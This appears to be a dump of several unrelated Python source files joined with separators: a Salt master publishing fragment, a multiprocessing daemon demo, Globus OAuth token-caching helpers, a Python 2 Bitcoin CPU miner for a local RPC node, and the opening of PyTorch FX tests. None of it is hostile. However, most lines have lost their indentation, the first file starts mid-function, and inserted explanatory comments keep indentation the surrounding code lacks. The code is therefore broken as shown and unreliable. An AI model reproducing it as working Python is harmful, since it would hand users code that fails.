payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient, (pull_uri,), loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send the list of minions through so the transport can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
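# --- Illustrative sketch (not part of the upstream module) ---------------
# publish() hands the PubServer a dict of the form
#   {"payload": <serialized, encrypted load>, "topic_lst": [minion ids]}
# over the IPC pull socket; "topic_lst" is only present for list targeting.
# The helper below just assembles that shape from already-serialized data,
# without any crypto or IPC, to make the wire contract explicit.
def _example_build_int_payload(serialized_payload, match_ids=None):
    int_payload = {"payload": serialized_payload}
    if match_ids is not None:
        int_payload["topic_lst"] = list(match_ids)
    return int_payload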
|
32.multiprocessing_daemonprocess.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print('Starting:', p.name, p.pid)
sys.stdout.flush()
time.sleep(2)
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
def non_daemon():
p = multiprocessing.current_process()
print('Starting:', p.name, p.pid)
sys.stdout.flush()
print('Exiting :', p.name, p.pid)
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non-daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
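# --- Illustrative note (not in the original snippet) ----------------------
# Because d.daemon is True and the main program exits roughly one second
# after starting it, the daemon's "Exiting" line is normally never printed:
# daemon processes are terminated when the parent finishes. Waiting on the
# daemon explicitly would let it run to completion, for example:
#
#     d.join()   # blocks ~2s until daemon() returns
#     n.join()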
|
auth.py
|
"""
Globus Auth Helpers.
"""
# A lot of this code is copied from the Globus Auth Example repo:
# https://github.com/globus/native-app-examples
import json
import stat
import queue
import functools
import threading
import webbrowser
from pathlib import Path
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import parse_qs, urlparse
import appdirs
import globus_sdk
import globus_sdk.auth.token_response
CLIENT_ID = 'dd2d62af-0b44-4e2e-9454-1092c94b46b3'
SCOPES = ('urn:globus:auth:scope:transfer.api.globus.org:all',
'openid')
__all__ = ['ensure_globus_authorized', 'get_refresh_token_authorizer']
class AuthenticationError(Exception):
"""
An error to be raised if authentication fails.
"""
class RedirectHTTPServer(HTTPServer):
def __init__(self, listen, handler_class):
super().__init__(listen, handler_class)
self._auth_code_queue = queue.Queue()
def return_code(self, code):
self._auth_code_queue.put_nowait(code)
def wait_for_code(self):
return self._auth_code_queue.get(block=True)
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(b'You\'re all set, you can close this window!')
code = parse_qs(urlparse(self.path).query).get('code', [''])[0]
self.server.return_code(code)
def log_message(self, format, *args):
return
def start_local_server(listen=('localhost', 0)):
"""
Start a server which will listen for the OAuth2 callback.
Parameters
----------
listen: `tuple`, optional
``(address, port)`` tuple, defaults to localhost and port 0, which
leads to the system choosing a free port.
"""
server = RedirectHTTPServer(listen, RedirectHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
def get_cache_file_path():
"""
Use appdirs to get the cache path for the user and add the filename.
"""
cache_dir = Path(appdirs.user_cache_dir("dkist"))
return cache_dir / "globus_auth_cache.json"
def get_cache_contents():
"""
Read the cache file, return an empty dict if not found or invalid.
"""
cache_file = get_cache_file_path()
if not cache_file.exists():
return {}
else:
try:
with open(cache_file) as fd:
return json.load(fd)
except (IOError, json.JSONDecodeError):
return {}
def save_auth_cache(auth_cache):
"""
Write the auth cache to the cache file.
Parameters
----------
auth_cache: `dict` or `~globus_sdk.auth.token_response.OAuthTokenResponse`
The auth cache to save.
"""
if isinstance(auth_cache, globus_sdk.auth.token_response.OAuthTokenResponse):
auth_cache = auth_cache.by_resource_server
cache_file = get_cache_file_path()
# Ensure the cache dir exists.
cache_dir = cache_file.parent
if not cache_dir.exists():
cache_dir.mkdir(parents=True)
# Write the token to the cache file.
with open(cache_file, "w") as fd:
json.dump(auth_cache, fd)
# Ensure the token file has minimal permissions.
cache_file.chmod(stat.S_IRUSR | stat.S_IWUSR)
def do_native_app_authentication(client_id, requested_scopes=None): # pragma: no cover
"""
Does a Native App authentication flow and returns a
dict of tokens keyed by service name.
"""
server = start_local_server()
redirect_uri = "http://{a[0]}:{a[1]}".format(a=server.server_address)
client = globus_sdk.NativeAppAuthClient(client_id=client_id)
client.oauth2_start_flow(requested_scopes=SCOPES,
redirect_uri=redirect_uri,
refresh_tokens=True)
url = client.oauth2_get_authorize_url()
result = webbrowser.open(url, new=1)
if not result:
print(f"Please go to {url} to authenticate with globus.")
print("Waiting for completion of Globus Authentication in your webbrowser...")
try:
auth_code = server.wait_for_code()
except KeyboardInterrupt:
raise AuthenticationError("Failed to authenticate with Globus.")
finally:
server.shutdown()
token_response = client.oauth2_exchange_code_for_tokens(auth_code)
# return a set of tokens, organized by resource server name
return token_response.by_resource_server
def get_refresh_token_authorizer(force_reauth=False):
"""
Perform OAuth2 Authentication to Globus.
Parameters
----------
force_reauth: `bool`, optional
If `True` ignore any cached credentials and reauth with Globus. This is
useful if the cache is corrupted or the refresh token has expired.
Returns
-------
`globus_sdk.RefreshTokenAuthorizer`
"""
tokens = None
if not force_reauth:
tokens = get_cache_contents()
if not tokens:
tokens = do_native_app_authentication(CLIENT_ID, SCOPES)
save_auth_cache(tokens)
auth_client = globus_sdk.NativeAppAuthClient(client_id=CLIENT_ID)
transfer_tokens = tokens['transfer.api.globus.org']
authorizers = {}
for scope, transfer_tokens in tokens.items():
authorizers[scope] = globus_sdk.RefreshTokenAuthorizer(
transfer_tokens['refresh_token'],
auth_client,
access_token=transfer_tokens['access_token'],
expires_at=transfer_tokens['expires_at_seconds'],
on_refresh=save_auth_cache)
return authorizers
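# --- Illustrative sketch (not part of this module) ------------------------
# Typical use of the authorizers returned above: hand the transfer-scope
# authorizer to a TransferClient. Wrapped in a function (and never called at
# import time) so it stays a documentation aid only.
def _example_make_transfer_client():
    authorizers = get_refresh_token_authorizer()
    return globus_sdk.TransferClient(
        authorizer=authorizers['transfer.api.globus.org'])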
def ensure_globus_authorized(func):
"""
A wrapper for functions that need valid globus authorization.
If the refresh token is invalid, this function will prompt the user to
log in.
"""
@functools.wraps(func)
def do_reauth(*args, **kwargs):
try:
return func(*args, **kwargs)
except globus_sdk.AuthAPIError as e:
if e.http_status == 400 and e.message == "invalid_grant":
print("Globus login has expired.")
get_refresh_token_authorizer(force_reauth=True)
return func(*args, **kwargs)
return do_reauth
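# --- Illustrative sketch (not part of this module) ------------------------
# Example of decorating a function that talks to Globus so an expired
# refresh token triggers a re-login and a single retry. The endpoint id,
# path, and pre-built client are placeholders for illustration only.
@ensure_globus_authorized
def _example_autosync_ls(transfer_client, endpoint_id, path="/"):
    # transfer_client: a pre-built globus_sdk.TransferClient (see above)
    return list(transfer_client.operation_ls(endpoint_id, path=path))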
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8944
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import io
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
import torch.nn.utils._stateless as _stateless
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
super().setUp()
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_concrete_arg_none_assert(self):
class Foo(torch.nn.Module):
def forward(self, x, val=None):
return x if val is None else x + val
f = Foo()
traced = torch.fx.symbolic_trace(f, concrete_args={'val' : None})
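# Specializing `val` to None bakes the `val is None` branch into the traced graph and
# inserts a runtime assert, so passing a real tensor for `val` now fails at call time.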
with self.assertRaisesRegex(AssertionError, 'val has been specialized to have value None'):
traced(torch.randn(5), torch.randn(5))
x = torch.randn(5)
torch.testing.assert_close(traced(x), f(x))
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# Test that we can use Proxy objects to generate more graph code later, for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# Save the original node list because we will insert new nodes as part of the test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + str(target)
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
